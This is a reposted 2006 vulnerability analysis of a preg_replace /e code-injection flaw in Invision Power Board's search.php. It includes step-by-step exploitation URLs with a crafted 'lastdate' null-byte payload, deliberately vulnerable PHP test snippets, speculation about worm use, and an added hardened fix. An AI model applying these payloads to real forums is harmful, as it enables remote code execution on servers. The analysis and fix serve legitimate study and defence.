ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net

2006-05-27 00:00:00
Anonymous
www.myhack58.com

Author: SuperHei_[At]_ph4nt0m.org
Blog: http://superhei.blogbus.com/
Team: http://www.ph4nt0m.org
Date: 2006-04-27

#############
##Simple analysis###
#############
The vulnerability is yet another preg_replace + /e vulnerability. The code is in \sources\action_admin\search.php, lines 1258-1262:

if ( $this->ipsclass->input['lastdate'] )
{
    $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
}

The /e modifier is injected through the variable input['lastdate'], and the shellcode planted in $this->output is then executed.

#############
##Use method###
#############

Register a user and post a message containing the following [shellcode]:

superheixxxxxxxeval(phpinf0()); //

Note the space between the final ; and the //.

Then click "Search" -> Search by Keywords: superheixxxxxxxeval [remember to choose "Show results as posts"].

You get a URL carrying the searchid:
http://127.0.0.1/ipb215/upload/inde…_in=posts&result_type=posts&highlite=superheixxxxxxxeval

Then append &lastdate=z|eval.*?%20//)%23e%00, that is, the [/e] modifier, and submit:

http://127.0.0.1/ipb215/upload/inde…_in=posts&result_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00

#############
##Analysis of discussion###
#############

1. Reference:
    Simple analysis:
    The vulnerability is yet another preg_replace + /e vulnerability. The code is in \sources\action_admin\search.php, lines 1258-1262:

    if ( $this->ipsclass->input['lastdate'] )
    {
        $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
    }

    The /e modifier is injected through the variable input['lastdate'], and the shellcode planted in $this->output is then executed.

This analysis skips over an important detail: preg_replace with /e takes three parameters, and only the second parameter is executed as code, yet the request above appears to submit the payload through the third parameter. In fact, look at the second parameter of the preg_replace above: "\\1 selected='selected'". The \\1 is the value captured by the regular expression in the first parameter. So in the end, the shellcode we submitted is still executed from the second parameter.

2. Reference: note the space between the final ; and the //.

Why is that? Because the lastdate we submit is z|eval.*?%20//)%23e%00, which uses space + // as its end marker, so the shellcode we submit must also end with space + //.

3. Does preg_replace have a null-byte truncation vulnerability???

I think this should count as a vulnerability in PHP itself [like the earlier include null-byte truncation]. To test the vulnerability above we write a simple model:

<?
$a = $_GET['a'];
echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i", "\\1 ", "heigegegxxxxxxxeval(phpinfo());//");
?>

Submitting http://127.0.0.1/test2.php?a=2 directly gives an error:
Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3

Submitting http://127.0.0.1/test2.php?a=%002 executes phpinfo(): the truncation succeeded. This model requires gpc=off (magic_quotes_gpc) to run, but many web applications encode and decode variables before using them, so they are not affected by gpc; the ipb case above can be truncated even with gpc=on.

4. Constructing "lastdate=z|eval.*?%20//)%23e%00"

The idea is to use eval and %20// (space + //) in $this->output as the start and end markers, so that \\1 captures the PHP code to be executed.

5. Worm use?

Remember Santy? It exploited a preg_replace in phpBB. This ipb exploit requires being logged in, and ipb registration has a "picture verification", but it is said that a program can be written to read it?? As long as that is broken through, a worm is possible; after all, ipb has so many users...

#############
##Summary of the model###
#############

1. Execute directly in the second parameter of preg_replace:
    <?
    $h = $_GET['h'];
    echo preg_replace("/test/e", $h, "just test");
    ?>
    Submit http://127.0.0.1/test/11/preg.php?h=phpinfo()
    Example: the phpbb viewtopic.php $highlight_match variable PHP code execution vulnerability

2. Use \\1 [or \\n] to extract PHP code from the third parameter and execute it:
    <?
    $h = $_GET['h'];
    echo preg_replace("/\s*\[php\](.*?)\[\/php\]\s*/ies", "\\1", $h);
    ?>
    Submit: http://127.0.0.1/test/11/preg.php?h=Codz: phpinfo()
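A hardened form of the search.php snippet, added here as an example and not IPB's own code: the user value goes through preg_quote() with the '#' delimiter, so it can neither close the pattern nor append modifiers such as /e, control bytes (including the NUL used for truncation above) are rejected before the value reaches preg_replace, and the replacement is a fixed string. The function name mark_selected and the option markup are assumed for illustration.

```php
<?php
// Hardened version of the lastdate highlight (added example, not IPB code).
function mark_selected(string $html, string $lastdate): string
{
    // Reject empty values and control bytes. A NUL is checked explicitly
    // rather than relying on preg_quote() to neutralise it.
    if ($lastdate === '' || preg_match('/[\x00-\x1f]/', $lastdate)) {
        return $html;
    }

    // preg_quote() escapes regex metacharacters and, via its second
    // argument, the '#' delimiter, so a value such as z|eval.*?//)#e is
    // matched literally and can no longer add an /e modifier.
    $quoted  = preg_quote($lastdate, '#');
    $pattern = '#(value=["\']' . $quoted . '["\'])#i';

    // Plain replacement string: no /e, nothing is evaluated.
    return preg_replace($pattern, "\\1 selected='selected'", $html);
}

// Constructed sample markup for the demonstration.
$html = '<option value="7">Last week</option>'
      . '<option value="30">Last month</option>';

// Legitimate value: the "30" option gains selected='selected'.
echo mark_selected($html, '30'), "\n";

// Hostile value from the write-up: no match, markup returned unchanged.
var_dump(mark_selected($html, 'z|eval.*?//)#e') === $html); // bool(true)
```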


Reference:
r57 exp: http://www.milw0rm.com/exploits/1720